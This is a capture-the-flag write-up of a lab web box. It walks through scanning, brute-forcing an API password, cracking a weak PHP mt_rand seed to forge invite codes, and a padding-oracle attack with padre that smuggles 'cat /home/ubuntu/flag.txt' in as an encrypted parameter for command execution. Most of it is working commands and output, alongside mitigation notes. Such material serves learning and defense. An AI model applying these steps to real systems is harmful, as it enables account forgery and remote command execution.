Scan
Simple one first,
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ nmap -Pn 10.10.94.129
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 00:36 +0530
Nmap scan report for 10.10.94.129
Host is up (0.47s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 4.14 secondslooks like we need to extend our search :
╰─❯ nmap -Pn -p- -sC -sV 10.10.235.4
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 08:58 +0530
Stats: 0:02:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.35% done; ETC: 12:16 (3:14:35 remaining)
Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.35% done; ETC: 12:16 (3:14:33 remaining)since nmap is gay, taking too much time im gonna use rust scan :
╰─❯ rustscan -a 10.10.235.4 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.
[~] The config file is expected to be at "/Users/tharushkadinujaya/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.235.4:22
Open 10.10.235.4:1337
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 08:56 +0530
Initiating Ping Scan at 08:56
Scanning 10.10.235.4 [2 ports]
Completed Ping Scan at 08:56, 0.67s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:56
Completed Parallel DNS resolution of 1 host. at 08:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 08:56
Scanning 10.10.235.4 [2 ports]
Discovered open port 1337/tcp on 10.10.235.4
Discovered open port 22/tcp on 10.10.235.4
Completed Connect Scan at 08:56, 0.46s elapsed (2 total ports)
Nmap scan report for 10.10.235.4
Host is up, received conn-refused (0.62s latency).
Scanned at 2025-02-22 08:56:26 +0530 for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
1337/tcp open waste syn-ack
Read data files from: /opt/homebrew/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.21 secondsso we found port number 1337, as we dont see too much lead on the info im moving on to ffuf scan to scan web-content files
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ ffuf -w /usr/share/wfuzz/wordlist/web-content-big.txt -u http://10.10.235.4:1337/FUZZ -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.235.4:1337/FUZZ
:: Wordlist : FUZZ: /usr/share/wfuzz/wordlist/web-content-big.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 440ms]
.htpasswd.php [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2629ms]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2629ms]
.htaccess.php [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2634ms]
api.php [Status: 200, Size: 1043, Words: 251, Lines: 29, Duration: 429ms]
css [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 417ms]
dashboard.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 416ms]
footer.php [Status: 200, Size: 245, Words: 38, Lines: 8, Duration: 444ms]
header.php [Status: 200, Size: 370, Words: 47, Lines: 13, Duration: 416ms]
index.php [Status: 200, Size: 3220, Words: 908, Lines: 77, Duration: 444ms]
javascript [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 625ms]
js [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 404ms]
logs [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 414ms]
phpmyadmin [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 454ms]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 477ms]
:: Progress: [40956/40956] :: Job [1/1] :: 90 req/sec :: Duration: [0:15:54] :: Errors: 960 ::lets see whats on the logs , on /log/aoo.log
2025-01-23 14:32:56 - User POST to /index.php (Login attempt)
2025-01-23 14:33:01 - User POST to /index.php (Login attempt)
2025-01-23 14:33:05 - User GET /index.php (Login page access)
2025-01-23 14:33:15 - User POST to /index.php (Login attempt)
2025-01-23 14:34:20 - User POST to /index.php (Invite created, code: MTM0ODMzNzEyMg== for alpha@fake.thm)
2025-01-23 14:35:25 - User GET /index.php (Login page access)
2025-01-23 14:36:30 - User POST to /dashboard.php (User alpha@fake.thm deactivated)
2025-01-23 14:37:35 - User GET /login.php (Page not found)
2025-01-23 14:38:40 - User POST to /dashboard.php (New user created: hello@fake.thm)
as we can see there is a base64 encoded invite code :
┌──(neo㉿0xneoxploit)-[~]
└─$ echo "MTM0ODMzNzEyMg==" | base64 -d
1348337122 and alpha@fake.thm is deactivated then created new user account named hello@fake.thm, i tried to login with these combinations but that didnt work, lets see whats inside js folder
function b(c,d){const e=a();return b=function(f,g){f=f-0x165;let h=e[f];return h;},b(c,d);}const j=b;function a(){const k=['16OTYqOr','861cPVRNJ','474AnPRwy','H7gY2tJ9wQzD4rS1','5228dijopu','29131EDUYqd','8756315tjjUKB','1232020YOKSiQ','7042671GTNtXE','1593688UqvBWv','90209ggCpyY'];a=function(){return k;};return a();}(function(d,e){const i=b,f=d();while(!![]){try{const g=parseInt(i(0x16b))/0x1+-parseInt(i(0x16f))/0x2+parseInt(i(0x167))/0x3*(parseInt(i(0x16a))/0x4)+parseInt(i(0x16c))/0x5+parseInt(i(0x168))/0x6*(parseInt(i(0x165))/0x7)+-parseInt(i(0x166))/0x8*(parseInt(i(0x16e))/0x9)+parseInt(i(0x16d))/0xa;if(g===e)break;else f['push'](f['shift']());}catch(h){f['push'](f['shift']());}}}(a,0xe43f0));const c=j(0x169);these are looks like some invite codes, i tried them all with new hello@fake.thm but non of them worked, tried to do the same on api documentation and it worked.
first i checked the response when i enter incorrect password to api.php
┌──(neo㉿0xneoxploit)-[~]
└─$ curl -X POST http://10.10.235.4:1337/api.php -d "api_password=incorrectpassword" -i
HTTP/1.1 200 OK
Date: Sat, 22 Feb 2025 05:02:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1134
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Decryptify API</title>
<link href="/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<header class="bg-primary text-white text-center py-3">
<h1>Decryptify API Documentation</h1>
</header>
<main class="container my-5">
<h2>Enter API Password</h2>
<form method="POST" action="">
<div class="mb-3">
<label for="api_password" class="form-label">Password:</label>
<input type="password" class="form-control" id="api_password" name="api_password">
</div>
<button type="submit" class="btn btn-primary">Access API</button>
</form>
<div class="alert alert-danger mt-3">Incorrect password.</div>
</main>
<footer class="bg-light text-center py-3">
<p>© 2025 Decryptify</p>
</footer>
<script src="/js/bootstrap.bundle.min.js"></script>
</body>
</html>
it returns size : 1134 , so i used -fs “filter by response size”, so incorrect responses wont show up
┌──(neo㉿0xneoxploit)-[~]
└─$ ffuf -w wordlist.txt -u http://10.10.235.4:1337/api.php -H "Content-Type: application/x-www-form-urlencoded" -d "api_password=FUZZ" -fs 1134
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.235.4:1337/api.php
:: Wordlist : FUZZ: /home/neo/wordlist.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : api_password=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1134
________________________________________________
H7gY2tJ9wQzD4rS1 [Status: 200, Size: 3034, Words: 923, Lines: 69, Duration: 1425ms]
:: Progress: [11/11] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
we successfully logged into api.php
there is a code toekn genration
// Token generation example
function calculate_seed_value($email, $constant_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$seed_value = hexdec($email_length + $constant_value + $email_hex);
return $seed_value;
}
$seed_value = calculate_seed_value($email, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);The token are generated with the following steps:
-
Extract Email Length:
-
The function calculates the length of the given
$emailstring.
-
-
Convert First 8 Characters of Email to Hex:
-
The function extracts the first 8 characters of
$emailand converts them to a hexadecimal number usinghexdec().
-
-
Calculate Seed Value:
-
The function adds the email length, a constant value (
$constant_value), and the hex-decimal converted value to form a seed.
-
-
Seed the Random Number Generator:
-
The
mt_srand($seed_value)function sets the seed for PHP’s Mersenne Twister (mt_rand()).
-
-
Generate Random Number:
-
mt_rand()produces a pseudo-random number.
-
-
Encode in Base64:
- The generated random number is converted into a Base64 string and used as the invite code.
Predictable Randomness (Weak Seeding)
-
The seed value is deterministic, as it is calculated using the email and a constant value.
-
Given the same email and constant,
mt_rand()will always generate the same invite code.
More : Predictable Randomness and Weak Seeding in PHP>>>
1. Invite Code Generation Process:
The system generates invite codes using the following process:
-
Seed Calculation: A seed value is calculated based on the user’s email address:
$seed_value = $email_length + $constant_value + $email_hex$email_length: Length of the email address.$email_hex: Hexadecimal representation of the first 8 characters of the email address.$constant_value: A secret constant (the vulnerability).
-
Random Number Generation:
mt_rand()is seeded with$seed_valueto generate a pseudo-random number. -
Encoding: The generated number is Base64 encoded to create the invite code.
2. Exploitation Steps:
- Obtain a known invite code: A valid invite code (e.g.,
MTM0ODMzNzEyMg==) is required. - Decode the invite code: Base64 decode the invite code to obtain the raw integer (e.g.,
1348337122) generated bymt_rand(). - Brute-force the seed: Use
php_mt_seedto find the seed that generated the raw integer. The tool iterates through possible seed values until it finds one that produces the target number (e.g.,1324931). - Calculate the constant: Using the known seed, the email address used to generate the original code (e.g., “alpha”), and the seed calculation formula, reverse-engineer the
$constant_value(e.g.,99999). - Generate new invite codes: With the
$constant_valuenow known, generate invite codes for any email address using the same formula andmt_rand(). For example, for the email “hello”, a new invite code (NDYxNTg5ODkx) can be generated. - Successful Login: The generated invite code can be used to log into the application.
Exploit
- Download and make php_mt_seed
┌──(neo㉿0xneoxploit)-[~]
└─$ wget -q https://www.openwall.com/php_mt_seed/php_mt_seed-4.0.tar.gz
┌──(neo㉿0xneoxploit)-[~]
└─$ tar -xzf php_mt_seed-4.0.tar.gz
┌──(neo㉿0xneoxploit)-[~]
└─$ cd php_mt_seed-4.0
┌──(neo㉿0xneoxploit)-[~/php_mt_seed-4.0]
└─$ make
gcc -Wall -march=native -mtune=generic -O2 -fomit-frame-pointer -funroll-loops -fopenmp php_mt_seed.c -o php_mt_seed
php_mt_seed.c:81:2: warning: #warning SSE2 not enabled, will use non-vectorized code. Try gcc -msse2 (on non-ancient x86 CPUs). [-Wcpp]
81 | #warning SSE2 not enabled, will use non-vectorized code. Try gcc -msse2 (on non-ancient x86 CPUs).
| ^~~~~~~
we can ignore the error while it doesn’t affect the process, now we gonna use the php_mt_seed tool to find all the possible seed values that could have generated the random number 1348337122.
┌──(neo㉿0xneoxploit)-[~/php_mt_seed-4.0]
└─$ ./php_mt_seed 1348337122
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 3708.6 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x01ffffff, speed 0.0 Mseeds/s
seed = 0x00143783 = 1324931 (PHP 7.1.0+)
Found 1, trying 0x18000000 - 0x19ffffff, speed 22.8 Mseeds/s
seed = 0x198ad677 = 428529271 (PHP 7.1.0+)
Found 2, trying 0x2a000000 - 0x2bffffff, speed 23.1 Mseeds/s
seed = 0x2addc25a = 719176282 (PHP 7.1.0+)
Found 3, trying 0x36000000 - 0x37ffffff, speed 23.1 Mseeds/s
seed = 0x37aaaa7b = 933931643 (PHP 5.2.1 to 7.0.x; HHVM)
Found 4, trying 0x58000000 - 0x59ffffff, speed 23.1 Mseeds/s
seed = 0x590030a0 = 1493184672 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x590030a0 = 1493184672 (PHP 7.1.0+)
Found 6, trying 0x66000000 - 0x67ffffff, speed 23.1 Mseeds/s
seed = 0x66c05097 = 1723879575 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x66c05097 = 1723879575 (PHP 7.1.0+)
Found 8, trying 0x84000000 - 0x85ffffff, speed 23.1 Mseeds/s
seed = 0x850b0811 = 2232092689 (PHP 7.1.0+)
Found 9, trying 0xfe000000 - 0xffffffff, speed 23.0 Mseeds/s
Found 9we found 9 matches, so now we need to find the constant value based on the seed values we found (9 possible values)
Calculating the Invite Code
Since the seed value is the sum of values derived from the email address and the constant_value, and now that we have the possible seed values and the email, we can calculate the constant_value using a PHP script:
<?php
function calculate_seed_value($email, $constant_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$seed_value = hexdec($email_length + $constant_value + $email_hex);
return $seed_value;
}
$email = 'alpha@fake.thm';
$lower = 1324931;
$upper = 2232092689;
$target = 1348337122; // decoded from MTM0ODMzNzEyMg==
for ($constant_value = $lower; $constant_value <= $upper; $constant_value++) {
$seed_value = calculate_seed_value($email, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
if ($random == $target) {
echo "Found constant value: " . $constant_value . "\n";
// Now generate new invite code for hello@fake.thm
$new_seed = calculate_seed_value("hello@fake.thm", $constant_value);
mt_srand($new_seed);
$new_random = mt_rand();
$new_invite = base64_encode($new_random);
echo "New invite code for hello@fake.thm: " . $new_invite . "\n";
break;
}
}
?>Explaination
- What We Found Initially:
- We found an invite code in the logs:
MTM0ODMzNzEyMg== - This was used for
alpha@fake.thm - We could see the code that generates these invites in the API documentation
- We found an invite code in the logs:
- Understanding the Code: The server generates invite codes using this process:
- Takes an email address
- Adds some secret constant value
- Uses that sum to seed a random number generator
- The random number becomes the invite code (after base64 encoding)
- The Vulnerability:
- The random number generator (
mt_rand()) isn’t truly random - If you use the same seed, you get the same “random” number
- We can work backwards from a known invite code to find the secret constant
- The random number generator (
- How We Exploited It:
- First, we decoded the invite code from base64:
MTM0ODMzNzEyMg==→1348337122 - Used
php_mt_seedtool to find possible seed values that could generate this number - Got a range of possible seeds: from
1324931to2232092689 - Wrote a script that:
- Tried different constant values
- Used alpha@fake.thm’s email to see which constant would generate our known number
- Once found, used that same constant with hello@fake.thm to generate a new valid invite code
- First, we decoded the invite code from base64:
- Why It Worked:
- The server uses the same constant value for all invites
- Once we found that constant, we could generate valid invite codes for any email
- The server can’t tell the difference between real invites and our generated ones
It’s like finding out someone’s password generation method - once you know how they make passwords, you can make your own that look just like real ones. This is why cryptographically secure random number generators are important in security!
if u doubt Why We used seed range as constant range? check the linked note, HOLD ON, even though after i did this using this long ass code my brain just figured this small maths after 3hrs :
<?php
$email = "alpha@fake.thm";
$seed_value = 1324931;
$email_length = strlen($email); // Get the length of the email
$email_hex = hexdec(substr($email, 0, 8)); // Convert the first 8 characters of the email to hexadecimal
$sum_value = dechex($seed_value); // Convert seed_value to hexadecimal (but this step isn't needed for the calculation)
$constant_value = $sum_value - ($email_length + $email_hex); // Calculate constant value
echo "The constant value is: " . $constant_value; // Output the constant value
?>So after u use the generated invite code and logging using hello@fake.thm it works and u get the first flag.
Second Flag
as after we logged in on the website their is no clue for the second flag, inspected the code and i saw something interesting :
<form method="get">
<input type="hidden" name="date" value="XuANvrtA//tLRn+ISVw6FEoAUnNdR94A8Ram5RWBEWQ=">
</form>something with hidden attribute so it wont show up on frontend, so their is a date variable i tried to pass the same value on the form and got this :
© Padding error: error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length Decryptify
after some time about researching padding error and i searched padding error vulnerability, and found this :
If the server returns an “invalid padding” error instead of a generic “decryption failed” error, the attacker can use the server as a padding oracle to decrypt (and sometimes encrypt) messages.
SOURCE : Wikipedia
More from chatgpt :
1. Vulnerability:
The application used block cipher encryption (likely CBC mode) for the date parameter in a URL. Critically, the server returned informative error messages when the padding of the decrypted ciphertext was incorrect. This feedback mechanism formed the “oracle” exploited in the attack.
2. Attack Steps:
- Padding Oracle Detection: The Padre tool identified the padding oracle vulnerability and determined the block size used in the encryption (8 bytes).
- Initial Decryption: Padre was used to decrypt the default encrypted
dateparameter, revealing the commanddate +%Yused to display the current year. This demonstrated the feasibility of the attack. - Command Encryption: The command
cat /home/ubuntu/flag.txt(to read the flag file) was encrypted using Padre, resulting in the ciphertext:8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw==. - Ciphertext Injection: This encrypted command was injected into the URL as the
dateparameter:http://10.10.225.140:1337/dashboard.php?date=8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw==. - Command Execution: The server decrypted the injected ciphertext, executed the embedded command, and displayed the flag in the footer of the page.
3. Technical Details:
- Block Cipher Padding: The attack exploited weaknesses in the padding scheme of a block cipher, likely Cipher Block Chaining (CBC). Incorrect padding resulted in detectable errors from the server.
- Oracle Feedback: The server’s error messages provided crucial feedback, allowing the attacker to iteratively decrypt and encrypt data.
- Encrypted Parameter: The use of an encrypted parameter allowed the attacker to inject arbitrary ciphertext, which was then processed by the server.
4. Mitigation:
- Secure Padding: Implement robust padding schemes that don’t leak information through error messages (e.g., use proper error handling that doesn’t reveal padding information).
- Proper Error Handling: Avoid revealing information about the encryption process or padding errors in server responses. Return generic error messages instead.
- Avoid Predictable Feedback: Don’t provide feedback that allows an attacker to distinguish between valid and invalid padding.
- Use Authenticated Encryption: Employ authenticated encryption modes (like AES-GCM) which inherently protect against padding oracle attacks.
5. Conclusion:
This successful Padding Oracle Attack demonstrated a critical vulnerability stemming from insecure handling of encrypted data and error responses. The attacker successfully bypassed security measures by exploiting predictable error messages and executing arbitrary commands on the server. Implementing robust encryption techniques and careful error handling is crucial to prevent similar attacks.
So first i tried to send an encrypted command in base64 (“hello”) and it didnt work :
┌──(neo㉿0xneoxploit)-[~]
└─$ padre -u 'http://10.10.59.48:1337/dashboard.php?date=$' --cookie 'PHPSESSID=lj1823u126qmo97qu7jhpibcm6' 'aGVsbG8gd29ybGQK'
[i] padre is on duty
[i] using concurrency (http connections): 30
[+] successfully detected padding oracle
[+] detected block length: 8
[!] mode: decrypt
[1/1] [-] Ciphertext length is not compatible with block length (12 % 8 != 0)
┌──(neo㉿0xneoxploit)-[~]
└─$ padre -u 'http://10.10.59.48:1337/dashboard.php?date=$' --cookie 'PHPSESSID=lj1823u126qmo97qu7jhpibcm6' -enc 'hello'
[i] padre is on duty
[i] using concurrency (http connections): 30
[+] successfully detected padding oracle
[+] detected block length: 8
[!] mode: encrypt
[1/1] MnMKfeya8uByZ2VnYmJmZQ== [16/16] | reqs: 1013 (30/sec)1. Decryption Attempt Failure:
The command:
padre -u 'http://10.10.59.48:1337/dashboard.php?date=$' --cookie 'PHPSESSID=lj1823u126qmo97qu7jhpibcm6' 'aGVsbG8gd29ybGQK'
attempted to decrypt the Base64 encoded string aGVsbG8gd29ybGQK. The key output is:
[1/1] [-] Ciphertext length is not compatible with block length (12 % 8 != 0)
This failure is due to incorrect ciphertext length. The decoded string “hello world” is 11 bytes long, which, when padded for a block cipher with an 8-byte block size, should result in a 16-byte ciphertext (a multiple of 8 bytes). The provided ciphertext is not a valid multiple of the block size. Padre cannot decrypt because the padding is invalid or missing, leading to the error.
2. Successful Encryption:
The command:
padre -u 'http://10.10.59.48:1337/dashboard.php?date=$' --cookie 'PHPSESSID=lj1823u126qmo97qu7jhpibcm6' -enc 'hello'
successfully encrypted “hello”. Padre automatically handles padding to ensure the ciphertext length is a multiple of the block size (8 bytes). The output MnMKfeya8uByZ2VnYmJmZQ== represents the correctly padded and encrypted ciphertext.
so we go the encrypted version of the input (hello) in the format that the server expects.lets decrypt again and see the server response :
┌──(neo㉿0xneoxploit)-[~]
└─$ padre -u 'http://10.10.59.48:1337/dashboard.php?date=$' --cookie 'PHPSESSID=lj1823u126qmo97qu7jhpibcm6' 'MnMKfeya8uByZ2VnYmJmZQ=='
[i] padre is on duty
[i] using concurrency (http connections): 30
[+] successfully detected padding oracle
[+] detected block length: 8
[!] mode: decrypt
[1/1] hello\x03\x03\x03 So lets encrypt cat /home/ubuntu/flag.txt in valid length for the block cipher using padre
┌──(neo㉿0xneoxploit)-[~]
└─$ padre -u 'http://10.10.59.48:1337/dashboard.php?date=$' --cookie 'PHPSESSID=lj1823u126qmo97qu7jhpibcm6' -enc 'cat /home/ubuntu/flag.txt'
[i] padre is on duty
[i] using concurrency (http connections): 30
[+] successfully detected padding oracle
[+] detected block length: 8
[!] mode: encrypt
[1/1] A5q/mxJa3txwxtWR2YHjL4lerd4CFQh6pB29C44EBiByaWdsem5hYg== now pass this encoded value to date variable and u will get the second flag. GGS
Anyways, This shit aint medium
